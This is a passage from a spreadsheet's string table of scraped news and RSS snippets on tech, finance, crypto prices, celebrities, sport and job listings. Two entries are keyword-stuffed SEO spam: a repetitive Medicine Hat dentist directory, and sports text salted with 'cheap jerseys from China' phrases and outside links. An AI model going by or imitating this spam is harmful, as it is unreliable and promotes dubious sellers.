was quick to remind Bezos that launching a constellation of satellites to provide broadband access to under-served communities is something he did in 2018 — when his space-exploration company SpaceX launched Starlink, which involves nearly 12,000 satellites. SpaceX submitted its regulatory filings for the project back in 2017. The space war between Musk and Bezos is years in the making. Musk founded SpaceX in 2002 to make space travel accessible to everyday people and to colonize Mars. In 2015, when Bezos bragged about Blue Origin’s successful rocket launch, Musk clapped back on Twitter. Musk gleefully pointed out that his company had done the same thing — three years earlier. @JeffBezos Not quite “rarest”. SpaceX Grasshopper rocket did 6 suborbital flights 3 years ago &amp; is still around. pic.twitter.com/6j9ERKCNZl — E (@elonmusk) November 24, 2015 Analyst predicts 50% spike in AMZN over the next year Meanwhile, Amazon’s long-term prospects appear to be off-the-charts, according to several Wall Street analysts. Michael Levine, a senior analyst with New York equity-research firm Pivotal Research Group, predicts that Amazon stock will rocket 50% over the next year to top $2,800 a share. Using Levine’s projection, that means Amazon — which is currently valued at about $924 billion — could rocket to $1.35 trillion by 2020. Levine said that Amazon stock will surge because it has “the highest-quality management and franchise within global internet,” calling it “a must-own name with huge upside even from here.” Moreover, Levine said Amazon’s move toward one-day shipping is a major catalyst that’s propelling it to “owning the consumer’s wallet.” Levine says even in spite of Amazon stock’s recent slowdown, it’s still set to explode in the near term.</t>
  </si>
  <si>
    <t>The Trump administration will propose today the rollback of Obama-era limits on emissions of methane at oil and gas operations, a government source said, which would relax standards on one of the main pollutants scientists link to climate change. CBC | World News</t>
  </si>
  <si>
    <t>▶️ Nimez x J100 x Drama B - MEDITATE🎵 Click that 🔔 to turn on notifications! DO NOT MISS AN UPLOAD! 🔽 Download/Stream this Song d(^_^)b 🔽 https://fanlink.to/MEDITATE 🎶 Exclusive Drop the Bassline Playlists 🎶 🔸 Memes &amp; Themes: http://bit.ly/Memes-Themes 🔸 Trap: http://bit.ly/DTBTrap 🔸 Dubstep: http://bit.ly/DTBDubstep 🔸 Future Bass: http://bit.ly/DTBFuture 🔸 Electro House: http://bit.ly/DTBElectro 🔸 […] The post Nimez x J100 x Drama B – MEDITATE appeared first on Dubster.</t>
  </si>
  <si>
    <t>Scott Thompson</t>
  </si>
  <si>
    <t>It seems the latest trend, for some, is to hang out at city hall every single weekend and protest, Scott Thompson says.</t>
  </si>
  <si>
    <t>Scathing report says Tory governments have held back progress on clean energy goalsThe government should discourage personal vehicle use and reward energy-efficient homebuilding to meet its legally binding target of net-zero carbon emissions by 2050, MPs have saidIn a scathing parliamentary report, the cross-party science and technology select committee said recent Conservative governments have promised more but done less on the climate crisis, which has left several gaping policy holes that need to be filled. Continue reading… Read More</t>
  </si>
  <si>
    <t>SACRED GAMES season 2 arrived on Netflix last week as the epic crime thriller continued. The new series saw madam Jojo Mascarenas feature more heavily in the story but what’s the character’s backstory? Daily Express :: TV and Radio Feed Sacred Games season 2 Jojo backstory explained: What happened to Jojo?</t>
  </si>
  <si>
    <t>Schow Dental is a dental practice in Medicine Hat (Southern Alberta) providing root canal treatments and root canal surgery. Dentists Phone Number 403-580-5520 Directions Message Website Search nearby. Preferred Dental Clinic Near Medicine Hat Friendliest Dental Clinic Near Medicine Hat Alberta Medicine Hat Dentists at Courtyard Dental Centre are dedicated to family dentistry such as Exams, Teeth Whitening, Veneers and more. We are looking forward to your visit to our Medicine Hat, Alberta dental office. (403) 529-1300 General Family. Best Dentists in Medicine Hat, AB – Courtyard Dental Centre, Best Dentist In Medicine Hat Alberta Number 1 Dentist Near Medicine Hat Alberta Crestwood Dental – Your Medicine Hat Dentists At Crestwood Dental Clinic, we understand the struggle associated with trying to find a dentist office that accommodates not only children, but teens, seniors, and the rest of your family. That’s why. Phone Number. 403-529-1300; Directions; Search nearby; 7 Courtyard Dental Top Fun Activities &amp; Games in Medicine Hat, Alberta Canada Alberta Medicine Hat Things to Do in Medicine Hat Activities &amp; Games in Medicine Hat Fun Activities &amp; Games in Medicine Hat When are you traveling? Start Date. . Top Parks &amp; Nature Attractions in Medicine Hat, Alberta Canada Alberta Medicine Hat Things to Do in Medicine Hat Parks &amp; Nature in Medicine Hat. See here the whole list of our best Dentists from Medicine Hat and their surroundings reviewed by StarOfService community from Medicine Hat – Alberta. Do you want to know who is in the top 100 ?. Medicine Hat, Alberta 257 Dentists near you. Go . StarOfService Alberta Medicine Hat Dentists. Hire the best Dentists . in Medicine Hat . 1. Search or browse RateMDs for trusted reviews &amp; ratings on Dentists in Medicine Hat. We're the original doctor ratings site with over 2 million reviews. Very great doctor . Very happy to see him in maple creek Sask. I haven't seen. Best Dentists in Medicine Hat, AB – Courtyard Dental Centre, Crestwood Dental Clinic, Southside Dental, Sun City Dental, Dr. Brenda Krasko Family Dental, River Dental, Grover Dental Centre, Schow Dental, Galvin Dental, Park Meadows Dental. Find the best Dentist in Medicine Hat, AB. Discover Dentists real customer reviews and contact details, including hours of operation, the address and the phone number of the local Dentist you are looking for. Bright`s Prosthetic Laboratory Ltd. Dentist in Medicine Hat. Number 1 Dentist Near Medicine Hat Alberta Crestwood Dental – Your Medicine Hat Dentists At Crestwood Dental Clinic, we understand the struggle associated with trying to find a dentist office that accommodates not only children, but teens, seniors, and the rest of your family. That’s why. Phone Number. 403-529-1300; Directions; Search nearby; 7 Courtyard Dental Centre. 459 1 Street SE, Medicine Hat, Search or browse RateMDs for trusted reviews &amp; ratings on Dentists in Medicine Hat. We’re the original doctor ratings site with over 2 million reviews. Near Me. All Male Female. All Verified Doctors Only. All Accepting New Patients. The Best Dentists in Medicine Hat, AB What is a Dentist? Dr. David Stock. Verified. Outstanding Staff. World. The Best Dentists in Medicine Hat Handpicked Top 3 Dentists in Medicine Hat, AB. They face a rigorous 50-Point Inspection, which includes everything from checking reviews, ratings, reputation, history, complaints, satisfaction, trust and cost to the general excellence. Search or browse RateMDs for trusted reviews &amp; ratings on Dentists in Alberta. The Best Dentists in Alberta What is a Dentist? Dr. Glenn Chan. Verified. Outstanding Staff. World Class Punctuality. Dr. Glenn Chan’s Latest Rating. I drive all the way from Medicine Hat to see dr Chan and I am a TOTAL BABY. He is absolutely worth the drive. Top Medicine Hat Room Escape Games: See reviews and photos of room escape games in Medicine Hat, Alberta on TripAdvisor. Medicine Hat Medicine Hat Tourism Medicine Hat Hotels Medicine Hat Bed and Breakfast Medicine Hat Vacation Packages. .</t>
  </si>
  <si>
    <t>French Persian Dictionary – travel dictionary to translate French to Persian. Click on the list to show French or Persian synonyms to understand the broader use of the words. The learning games help to build vocabulary. View the history of words used in the game again clickable for synonyms. Ideal for travelers, business people or … Continue reading French Persian Dictionary →</t>
  </si>
  <si>
    <t>Nick Westoll</t>
  </si>
  <si>
    <t>"If these lottery winners are all ultimately approved for licences, we will have seven stores in Toronto that are on Queen Street alone."</t>
  </si>
  <si>
    <t>United States rap artist A$AP Rocky has been found guilty of assault by a Swedish court after a street brawl in Stockholm in June. Rocky and two associates were given a suspended sentence and don't face any more jail time. Image: AP</t>
  </si>
  <si>
    <t>We are looking for a data entry and accounts payable specialist to start immediately. Successful candidates will have three to five years of accounts payable and data entry experience and working knowledge of sage 50 accounting software. Please send your resume to the email address listed below. Qualifications required Accounting Course from a college or .. Read more</t>
  </si>
  <si>
    <t>Champion hoop Damien Oliver embarks on his 30th spring carnival, driven in his search to find the next champion racehorse.</t>
  </si>
  <si>
    <t>She usually sports a perfectly maintained head of glossy brunette hair. Yet Faye Brookes underwent a stunning image transformation ahead of her appearance at Manchester Pride on Saturday, just days after splitting from her former fiancé Gareth Gates. The Coronation Street star, 31, unveiled her new flowing purple hair, which is likely to be a temporary wig, as she arrived at the event and jumped on one of the floats. New look: Faye Brookes underwent a stunning image transformation ahead of her appearance at Manchester Pride on Saturday, just days after splitting from her former fiancé Gareth Gates Faye ensured all eyes were on her as she donned an eye-catching floor-length silver sequined jumpsuit, complete with a plunging neckline. The actress’ dazzling one-piece featured a structured top which highlighted her svelte physique as well as layered ruffled trousers. Faye went all out as she also added dazzling gem face stickers to her make-up look, which framed her heavily made up eyes and pink lips. Wow: The Coronation Street star, 31, unveiled her new flowing purple hair, which is likely to be a temporary wig, as she arrived at the event and jumped on one of the floats Glam: The actress’ dazzling one-piece featured a structured top which highlighted her svelte physique as well as layered ruffled trousers Shine on in a sequin jumpsuit like Faye in Forever Unique Despite challenging times, the show must go on for Faye Brookes! The actress attended Manchester Pride looking literally dazzling in a sequin jumpsuit by celebrity favourite label Forever Unique. With its head to tie sequins and frill legs, Faye’s jumpsuit is perfect for making an Abba-esque entrance! Click right to shop Faye’s look for yourself – it’s also available in leopard print. We recommend keeping accessories to a minimum to let the outfit to the talking! Alternatively get the sequin style below – from PrettyLittleThing to Temperley London there’s a style for every budget. * PRICES MAY NOT BE AS ADVERTISED …NOW GET ONE LIKE IT Despite her recent romantic woes, Faye was all smiles as she arrived at the event with a friend brandishing a Pride flag in her hand. Faye, who quit the ITV soap earlier this year, was joined at the event by her former co-stars Charlie Di Melo and Sally Dynevor, made the most of the day as the cast laughed and joked on board a float. Tomorrow Ariana Grande will headline the event, over two years from the 2017 terrorist attack that took place at one of her concerts. So far Saara Alto, the ladies of Liberty X, Michelle Heaton, Kelli Young and Jessica Pietersen, have performed at this year’s Manchester Pride. Faye and Gareth split secretly last month following a series of bitter rows, but neither party want to spend time dwelling on the break-up. It was revealed last week that the couple had gone their separate ways, but an insider explained that the couple actually split last month, and Faye had moved out of his flat by mid July. Purple rain: Faye ensured all eyes were on her as she donned an eye-catching floor-length silver sequined jumpsuit, complete with a slightly plunging neckline The pair are said to have called an end to their wedding plans after Gareth disagreed with the Coronation Street star going out with her friends. Yet it appears there won’t be any bad blood between them as Faye just wants to ‘move on’ from the drama. The couple have also had time to heal as they managed to split and move out from their shared apartment before the news broke that they had parted ways. A source told MailOnline: ‘Faye and Gareth parted ways around a month ago, and she moved out of their flat in mid July. She had stopped wearing her engagement ring then too.’ Glitz and glam: Faye went all out as she also added dazzling gem face stickers to her make-up look, which framed her heavily made up eyes and pink lips Forever blowing bubbles: Faye appeared to be having a whale of a time with a bubble machine Having a ball: Faye, who was joined at the event by her former co-stars Charlie Di Melo and Sally Dynevor (pictured), made the most of the day as the cast laughed and joked on board a float Rainbow dream: Dolly Rose Campbell was wearing every colour under the sun on Saturday They added: ‘They had been disagreeing a lot, in particular Gareth was very vocal about who she associated with, and he had strong opinions about her career. ‘She knows them breaking up is for the best and just wants to move on with her life. ‘Faye is staying in Manchester where her family and so many of her friends are, and Gareth has regular work on a cruise ship which takes him out of the country a lot.’ Representatives for Faye and Gareth declined to comment when approached by MailOnline. Sweet: Sally attended the event with her 24-year-old daughter Phoebe Blinding: Charlie went all out in a glitzy yellow cape and dazzling trousers Pride: Rob Mallard (left) Daniel Brocklebank (right) were in attendance at the event Peace! The duo appeared in high spirits as they road the ITV float</t>
  </si>
  <si>
    <t>Windows 10 made big gains while Windows 7 experienced a large drop in users last month, as it appears that folks are finally starting to take the impending end of support deadline for the latter OS seriously. This is according to figures from Net Applications for July, which found Windows 10 increased its share by 3.1% to stand at 48.9% in the overall desktop market (meaning not just Windows installations, but macOS, Linux and Chrome OS too). Are you thinking of upgrading to Windows 10? Here’s everything you need to know about using Windows 10 Want to stick with Windows 7 after 2020? It’ll cost you… The analytics firm reported that Windows 7 dropped 3.6% – down to 31.8% – and it’s a fairly reasonable assumption to make that the majority of this shift consisted of folks upgrading to Windows 10. Particularly when you consider that Windows 7’s lifespan is rapidly dwindling, with support for the OS officially ending on January 14, 2020 (only five months away). Indeed, Microsoft has already started actively warning Windows 7 users that their time is running out, so it appears that people are finally listening, and making the move away from the venerable operating system. Telling decline What’s also very telling is that Windows 7’s decline of 3.6% in July is the second largest drop that Net Applications has ever observed, and equally, the boost for Windows 10 is the second largest increase – seemingly underlining the shift that is going on here. All of which is good news for the overall security picture of Windows PCs, because as of mid-January 2020, Windows 7 will be open to all manner of exploits going forward, seeing as any vulnerabilities that pop up in the OS won’t be patched. That didn’t stop folks sticking with Windows XP long past its sell-by-date, mind you, and we’re likely to witness the same scenario with a good number of hardcore holdouts staying on Windows 7 as we move further into 2020 and beyond. What’ll be interesting to see is if Microsoft will step in to save Windows 7 users from a major malware attack post-support deadline, as it did with Windows XP and WannaCry (and indeed further spins on that particularly nasty ransomware). Or if this time around, the software giant will stick to its guns, and say that no patches really means no patches. Some of the best laptops of 2019 run Windows 10 Via Computerworld Intology Limited: http://www.intology.co.uk/about-us.php Twitter: https://twitter.com/Intology Facebook: https://www.facebook.com/Intology Read more: Windows 10 wins big as looming support deadline sees Windows 7 users abandon ship</t>
  </si>
  <si>
    <t>She is the gorgeous model girlfriend who has found happiness with ­football superstar Cristiano Ronaldo and backed him during one of his toughest years.</t>
  </si>
  <si>
    <t>Beyond the bowling, there are also multiple flat screen tvs, Medicine Hat’s only kid friendly pool tables, a Kidsworld play park and nightly food and drink specials. Panorama Lanes is a place where kids, and the entire family can spend hours at. But there’s been mixed feelings among the tight-knit family, as U-Haul International makes moves. that they will then. Researchers examined 16 million people in the Swedish Family-Cancer Database. Try to avoid toothpicks or dental floss and. All kid friendly events in Medicine Hat, Alberta. Here you can find more information about Upcoming events in Medicine Hat like parties, concerts, meets,shows, sports, club, reunion, Performance All kid friendly events in Medicine Hat, Alberta. Best Kid Friendly Restaurants in Medicine Hat, Alberta: Find TripAdvisor traveler reviews of THE BEST Medicine Hat Kid Friendly Restaurants and search by price, location, and more. Medicine Hat Medicine Hat Tourism Medicine Hat Hotels Medicine H. Preferred Dental Clinic In Medicine Hat Crestwood Dental Clinic 2 reviews. Medicine Hat, AB. Crestwood Dental in Medicine Hat is hiring! If you are looking for an opportunity to join the best dental team in Medicine Hat. Serving the Medicine Hat community for over 40 years, Crestwood Dental Clinic features a diverse group of dentists, hygienists, and dental assistants. Each brings The official opening of Mastermind Toys in Medicine Hat. kids on their list will now have the opportunity to enjoy the Mastermind Toys shopping experience in a colourful, energetic and friendly. Fun Things to Do in Medicine Hat with Kids: Family-friendly activities and fun things to do. See TripAdvisor's 690 traveller reviews and photos of kid friendly Medicine Hat attractions From hiking under towering redwoods to ice skating at Snoopy’s favorite rink and even an overnight African-style safari, I come from a family of hunters. The safe and friendly space they offer to hang out in is like the ultimate comfy living. Dedicated Dental Service: A personal touch to dental care – All of our doctors continue their education regularly, to keep growing and learning as dental techniques evolve. Our. Take your family to Medicine Hat for a Budget Friendly Alberta Staycation Share 2 Tweet Pin 3 You don’t have to go far to have a fun filled family vacation.</t>
  </si>
  <si>
    <t>Jakobi Meyers is a strong candidate to extend the New England Patriots’ streak of undrafted rookies on the 53-man roster. Source: Sports Business News</t>
  </si>
  <si>
    <t>Nathan Schmook</t>
  </si>
  <si>
    <t>West Coast champion Darren Glass will return to the club as list manager after a two-year stint as an assistant coach at Hawthorn.</t>
  </si>
  <si>
    <t>Liverpool boss provides Alisson injury update ahead of Chelsea and Arsenal fixtures Original Source Chelsea have been handed a huge boost ahead of their UEFA Super Cup clash with Liverpool on Wednesday. Frank Lampard’s side will be hoping to right the wrong of the 4-0 defeat against Manchester United at Old Trafford when they take on Jurgen Klopp’s side in Istambul. However their job could be a fair bit easier with the news of Allsson Becker’s calf injury. Read More The Liverpool stopper was forced off in the first half of their 4-1 Premier League victory over Norwich City on Friday night, and the club have confirmed that the Brazilian will be out for ‘a few weeks’. Speaking to the Liverpool club website, Klopp said: “[It’s] Not too cool. It’s a calf injury which takes him obviously out for a while. Video Loading Video Unavailable Click to play Tap to play The video will start in 8Cancel Play now “I don’t want to make now [an] exact prognosis on when he will be back but it will not be Wednesday for sure, so now then we have to see. “It takes a while, it takes a couple weeks for sure, and we have to see. Keep up to date with the latest Chelsea news, features and exclusives from football.london via our free WhatsApp service . Click here to enroll or text NEWS to 07557204594 and then add the number to your phone contacts book as chelsea dot london (case sensitive, with spaces) to receive daily updates and breaking news from Oliver Harbord and the team on Chelsea. Your phone number won’t be shared with any other members of the group. Click here for more information on the service. “I saw already like ‘six weeks’ and stuff like this, but Ali was not a lot injured in his career so I would like to wait a little bit to see how he develops in that process now, but he is not in for the next few weeks.” If that timescale is correct, it means that the goalkeeper could also miss Liverpool’s clash with Arsenal in August 24.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Liverpool boss provides Alisson injury update ahead of Chelsea and Arsenal fixtures appeared first on Premier League. Follow us on our social networks Posted on Bible Of Sport Bible Of Sport - Instagram Bible Of Sport - Twitter Bible Of Sport - Facebook Source link</t>
  </si>
  <si>
    <t>Marian  Faa</t>
  </si>
  <si>
    <t>Dark-coloured jerseys could lead to poor performance, increased rates of injury, and even jeopardise the careers of young rugby league players, researchers say.</t>
  </si>
  <si>
    <t>Japanese Swedish Dictionary – travel dictionary to translate Japanese to Swedish. Click on the list to show Japanese or Swedish synonyms to understand the broader use of the words. The learning games help to build vocabulary. View the history of words used in the game again clickable for synonyms. Ideal for travelers, business people or … Continue reading Japanese Swedish Dictionary →</t>
  </si>
  <si>
    <t>The traditional challenges of Fortnite Battle Royale are back at the beginning of season 10 in the form of "Road Trip" missions. One of these missions will ask you to visit the head of the Durrr Burger which bears the mark of the nomad, to visit a dinosaur, but also a stone head. Since there is …</t>
  </si>
  <si>
    <t>Charleville grazier Dan McDonald says he was simply doing what farmers around his parts have always done.</t>
  </si>
  <si>
    <t>Michael Gleeson, Caroline Wilson and Jake Niall look at the make-up of the top eight and how finals match-ups could look in week one.</t>
  </si>
  <si>
    <t>New Delhi: The National Company Law Tribunal (NCLT) has ordered start of insolvency proceedings against NCR-based realty firm Three C Projects Ltd and also appointed an Interim Resolution Professional (IRP) to take over the management of the debt-ridden company. A two-member principal bench, headed by President Justice M M Kumar, admitted a plea filed by five flat buyers who had booked homes in the company’s Lotus Zing project in Noida, Uttar Pradesh. “We are satisfied that a default has occurred and the applications under sub section 2 of section 7 (of IBC) is complete,” said NCLT. “As a sequel… this petition is admitted and Manish Kumar Gupta is appointed as the Interim Resolution Professional,” it added. NCLT also directed the ex-management of Three C Projects to “provide all documents in their possession and furnish every information in their knowledge” within a period of one week to the IRP. The tribunal declared a moratorium, protecting the company from the lenders by prohibiting them from recovering their dues for a certain period. The NCLT order came on a petition filed by flat buyers of the company for its project Lotus Zing, through their counsel Aditya Parolia, Partner, PSP Legal. Flat buyers, who are now treated as financial creditors after recent amendments in the Insolvency and Bankruptcy Code (IBC), had paid money to the realty firm as per their construction-linked payment plans on various dates. According to the buyer agreements, the flats were to be delivered in 33 months in the year 2014. Three C Projects submitted that the petition against it was not maintainable and that the project was delayed due to various factors, including demonetisation, order from NGT and farmers’ unrest. However, NCLT rejected the builder’s argument, saying that “submission made by the respondents (Three C Projects) is whole unsustainable.” According to the tribunal, objections like water supply interruptions and farmers agitation “are merely lame excuses to deny the claim of the financial creditors.” “The maximum period of 33 months has already expired either in 2013 or early 2014. The possession as per stipulation has not been handed over till date,” the tribunal observed. NCLT said while there was some delay due to reasons specified in the clauses of the buyer agreements, home buyers could not be expected to wait till eternity. “The clause cannot be given a literal meaning to mean that till eternity the corporate debtor would defer possession and the financial creditors are bound to wait. “A reasonable construction of any such clause would be to grant maximum period of one year. Even then, the possession should have been delivered in 2015,” it said. READ SOURCE The post NCLT directs insolvency proceedings against realty firm Three C Projects appeared first on BusinessTelegraph.</t>
  </si>
  <si>
    <t>Litecoin has seen a further 5% price decrease over the past 24 hours, declining to $70. This latest price drop is mostly a result of Bitcoin having dropped back beneath the $10,000 region as things have started to look bleak for the overall cryptocurrency market. Litecoin remains the fifth-largest cryptocurrency by market value with a market cap of $4.47 billion. Trading against Bitcoin, Litecoin managed to rebound at 0.007 BTC, but if this support were to break, we could see Litecoin trading at $50 in the next few weeks. Looking at the LTC/USD 1-day chart: Since our previous Litecoin analysis, Litecoin has fallen back to the support at the $70 level. This market seems to be on bearish footing, mainly due to the recent BTC breakdown. However, Litecoin’s fortunes could change upon reaching the significant support level around $67. From above: The nearest levels of resistance are $74.72 and $77.45. Above this, higher resistance lies at $80, $84.77 and $88 (the 200-day EMA). If the bulls can break above the 200-day EMA, further resistance lies at $90, $95-$96.18 and $100. From below: The nearest level of support is located at $67.23, provided by a short-term downside 1.272 Fibonacci extension. This level of support is further bolstered by a long-term rising support line. This combined area of support is expected to allow the market to rebound. If the sellers break beneath this level, further support can be found at $65, $63, $60.91 and $56.60. The trading volume remains low, in line with the rest of the market. The RSI is below 50, showing that sellers are in complete control. Looking at the LTC/BTC 1-day chart: Trading against Bitcoin, LTC has fallen lower but managed to find strong support at 0.007 BTC. Like the majority of altcoins, Litecoin’s Bitcoin market forecast is dire. However, if BTC does continue to fall in value, we may see a resurgence within the altcoin markets and a surge in the LTC/BTC market. From above: The nearest levels of resistance are 0.0074 BTC and 0.0078 BTC. Higher resistance is located at 0.008 BTC, 0.008244 BTC, and 0.0086 BTC. If the bulls can drive the price higher, further resistance is expected at 0.009 BTC and 0.0094 BTC. From below: The nearest level of support is 0.0070 BTC. If the sellers push the market beneath this level, additional support is expected at 0.0068 BTC, 0.0065 BTC, 0.006380 BTC, and 0.0060 BTC. The RSI is rising, which is a promising sign, as it shows that sellers are losing strength. However, we would need to see the RSI break above 50 for any bullish recovery to occur. The Stochastic RSI is looking to produce a bearish crossover signal which could be a bad sign for the bulls. Be the first to know about our price analysis, crypto news and trading tips: Follow us on Telegram or subscribe to our weekly newsletter.</t>
  </si>
  <si>
    <t>After starring role against All Blacks, centre has given a frank assessment of his time away from the Wallabies set-up.</t>
  </si>
  <si>
    <t>My wife and I sailing our 18 ft Hobie Cat in the ocean for the first time on our Thanksgiving 2009 vacation at Cherry Grove, Myrtle Beach, SC. Air and Water temperatures were around 60 degrees, probably a bit too cold for sailing without wetsuits. We’re actually wearing rain suits. Winds were around 10 knots. […] The post Hobie Cat Sailing appeared first on TRAVELAMBASSADOR.CA.</t>
  </si>
  <si>
    <t>The singer said he lent his private plane to the royal pair - but he paid to carbon offset the trip. The post Elton John defends Harry and Meghan’s use of private jets appeared first on Education - Career - Word Games - Distance learning.</t>
  </si>
  <si>
    <t>In the past few sessions, there were mostly bearish moves in bitcoin price below the USD 10,200 and USD 10,000 support levels. BTC/USD tested the last swing low near USD 9,750 and it is currently (08:00 UTC) correcting higher. However, upsides are likely to face a lot of hurdles near the USD 10,150 and USD 10,200 levels. Likewise, there was a strong decline in major altcoins, including ethereum, ripple, BCH, EOS, ADA, BNB, TRX and XLM. ETH/USD settled below the USD 190 support and tested the USD 180 support. XRP/USD broke the key USD 0.270 support and it might slide towards the USD 0.250 support. Total market capitalization Source: www.tradingview.com Bitcoin price After a bearish break below the USD 10,200 support, bitcoin price accelerated its decline below USD 10,000. BTC/USD revisited the USD 9,750 support area and it is currently correcting higher. An immediate resistance is near the USD 9,980 and USD 10,000 levels. However, the main resistances are near the USD 10,150 and USD 10,200 levels. If the price fails to recover above the USD 10,200 resistance, there could be a fresh decrease. The key support is near the USD 9,750 level, below which the price could decline towards the USD 9,500 support. Ethereum price Ethereum price extended its decline below the USD 190 support. ETH/USD tested the USD 180 level and it is currently trading near the USD 185 level. To climb higher, the price must surpass the USD 190 and USD 192 resistance levels. If there is no upside break above USD 192, the price could revisit the USD 180 level. Any further downsides might open the doors for a push towards the USD 170 and USD 165 levels. Bitcoin cash, eos and ripple price Bitcoin cash price extended its decline below the USD 300 support level. BCH/USD tested the USD 288 level and it is currently correcting higher. However, the previous supports near USD 300 and USD 305 are likely to prevent gains. The main resistance on the upside remains near the USD 320 level. EOS broke the next key support level near the USD 3.500 level. The price even broke the USD 3.400 and tested the USD 3.350 level. It seems like the price could continue to decline towards the USD 3.250 and USD 3.200 support levels in the coming sessions. On the upside, the previous support at USD 3.650 is now a crucial resistance. Ripple price settled below the USD 0.280 and USD 0.270 support levels. XRP/USD is clearly trading in a bearish zone and it seems like the price could decline towards the USD 0.250 support level. On the upside, the USD 0.270 level is a strong resistance, followed by USD 0.282. Other altcoins market today In the past three sessions, a few small cap altcoins extended decline by more than 5%, including EGT, ALGO, VSYS, QNT, MONA, DGB, LEO, DGTX and LINK. On the other hand, BAT, RIF, INB and ENJ recovered around 5%. Watch the latest reports by Block TV. To sum up, bitcoin price is facing a lot of hurdles on the upside near the USD 10,000, USD 10,150 and USD 10,200 levels. Therefore, BTC/USD could extend its decline below USD 9,750 unless the bulls gain momentum above USD 10,200. _____ Find the best price to buy/sell cryptocurrency:</t>
  </si>
  <si>
    <t>I struggled with the machines and the pop-reggae soundtrack but got a raw insight into the decline of British manufacturingHere’s how bad it was: even the jobcentre told me not to do it.The woman on the other side of the desk looked at my résumé, paused for what felt an age and made clear the position I wanted was not a good match. It was in a factory; I was at university. It was hard, dirty work; didn’t I want something better? It would be, well, “a waste”. Continue reading… Read More</t>
  </si>
  <si>
    <t>A glimmer of hope came on Monday when First Quantum Minerals announced in its quarterly report plans had begun to reopen the Ravensthorpe nickel mine by next year.</t>
  </si>
  <si>
    <t>EDF Energy is expected to restart reactor a year after it was shut down over safety concernsBritain’s nuclear watchdog has agreed to allow one of the country’s oldest nuclear reactors to restart, one year after it was shut down to investigate cracks in its graphite core.EDF Energy is expected to restart reactor 4 at its 40-year-old Hunterston B nuclear plant within weeks after the Office for Nuclear Regulation (ONR) said the plant was safe. Continue reading… Read More</t>
  </si>
  <si>
    <t>While the Netherlands carries global cachet, it’s a cohort from a different footballing culture — or accurately, group of cultures — that should be gaining more attention for their recent MLS achievements: coaches who were born and raised in Spanish-speaking countries. Source: Sports Business News</t>
  </si>
  <si>
    <t>mangobango</t>
  </si>
  <si>
    <t>Seems like a pretty decent deal. Delivery was $9.95 to my place in Metro Melbourne, and then 10% off came to $54.90 in total. Delivery will be shown at the checkout once you enter your address.</t>
  </si>
  <si>
    <t>He Nike NFL Jerseys From China was a disappointment as a rookie, but Freeman can still be a factor this season, even in nfl jerseys authentic a complementary role to Lindsay. McGinn was initially labeled out indefinitely, but this report clarifies that he’ll likely be sidelined until mid-November at NBA Jerseys Cheap a minimum. RealGM caught up with Rochestie to discuss his success in 2014 season, experiences while playing for Nizhny Novgorod, his shooting performance, his teammates Trey Thompkins and Artsiom Parakhouski, and much more. Running Back Adrian Peterson finished with 120 rushing yards from 19 carries and two rushing touchdowns. He brings MLB Jerseys China over 40 years of hockey experience as a player, scout and coach to game broadcasts on FOX Sports Ohio. Of course, everyone online can’t stop making the same joke about the irony of Drinkwater’s name, given the nature of his arrest. Per Shi Davidi of Sportsnet, Biggio was at Tropicana Field when he was sent back to the team hotel to… While that signals the public’s demand Wholesale NHL Jerseys for more responsibility from tech companies, it’s still quite likely that most consumers will continue to ignore these concerns for the sake of having the smartest home on the block. They need to keep shooting, but also do what head coach Bill Peters has asked and that is to liven front of the net and try to collect those If the team can start to get more of Wholesale NHL Jerseys their many shots-on-goal to convert to pucks in the net, then success will follow. The main thing about this saga is not what the new-look Heat will look like once they add him to their roster, or Wholesale Jerseys Cheap how the Wolves are going to navigate the season with an intensely miserable NBA Jerseys Cheap starting wing in tow. As a staff we want to thank the players who Cheap Jerseys Online are not going forward. Following their travels Wholesale Jerseys Cheap across America, the ‘Yotes will finally return to Arizona on Saturday night for their MLB Baseball Jerseys penultimate home contest against the St. Carson, who had an offseason arthroscopic knee procedure, missed OTAs and minicamp, but he’s Wholesale Detroit Pistons Jerseys been cleared for training camp work. Carter’s journey to cheap nfl jerseys china the NFL was no cakewalk. Men’s Nike Los Angeles Angels Home Practice Tank Top Red Price: $10.00 Recently, you may have read reports about a potential ownership transaction. On his podcast, The Boomin Experience Podcast, Brown shared a phone conversation with his agent, Drew Rosenhaus. And we’re talking about Joe Noteboom and Brian Allen, Kromer Nike NFL Jerseys From China said. Postmedia’s Bruce Garrioch It was no secret that Jason Botterill planned on altering the MLB Baseball Jerseys complexion of the Buffalo Sabres roster this summer, but even the MLB Jerseys China most optimistic fan couldn’t have predicted just how successful he’d be in doing so. 24, the ‘Yotes stayed in the Sunshine State for a matchup against the Tampa Bay Lightning on Monday night. Cheap Jerseys Online Alex Gray spoke to in January about his journey from the UK to North America, while Christian Scotland-Williamson signed a reserves contract with the Pittsburgh Steelers at the beginning of this year after joining the same pathway programme in 2018. An additional donation of $250 will be donated to the charity of his choice. He Cheap Detroit Pistons Jerseys might need to be one, too. Denver Broncos Critical Victory Pullover Hoodie Orange Price: $36.99 But it was bang, bang, bang. We ask that only teachers who think they will be fully dedicated to this program register. The Italian would sanction the sale of Icardi but will consider keeping Radja Nainggolan at San Siro. He was also a video scout for team Finland at the most recent World Cup of Hockey. In 2009, Rangers offensive defenseman Kevin Shattenkirk played for B.U. He’s got a good first step and he’s playing at a high level. http://clayremini.com/cost-48-pleased-with-the-long-toss-cheap-nfl-jerseys-nike/ https://displayteknik.com/they-probably-want-scored-groundout-bogaerts-kyrie-irving-jersey/</t>
  </si>
  <si>
    <t>Pharmaceutical General Labour Packaging $17 / hourMissisaugaFull Time HoursCompany is located Mississauga Rd and Derry Rd Shift Hours 8am to 4:30pm Key Responsibilities: -Load and unload trailers using various equipment-Label and wrap pallets for putaway and shipping-Operate Forklifts to transport, pick and putaway pallets-Organize and ensure warehouse is audit ready-Support other warehousing areas to complete .. Read more</t>
  </si>
  <si>
    <t>Driven out of Sydney by cost and congestion, loved-ones are scattering for an affordable, better life elsewhere, but family get-togethers become a challenge.</t>
  </si>
  <si>
    <t>Five workers were killed in an accident during a missile test at a military site in northern Russia, the country’s state nuclear agency Rosatom has confirmed. Read more? Click here</t>
  </si>
  <si>
    <t>Source: https://www.wired.com/story/the-horrifying-science-of-the-deforestation-fueling-amazon-fires Amazon Fires and the Horrifying Science of Deforestation At the core of Brazil’s out-of-control fires in the Amazon is deforestation. Here’s how human meddling fundamentally transforms a rainforest. Source: https://www.wired.com/story/the-horrifying-science-of-the-deforestation-fueling-amazon-fires The post Amazon Fires and the Horrifying Science of Deforestation appeared first on CYBERDEN.</t>
  </si>
  <si>
    <t>Patrick Daly</t>
  </si>
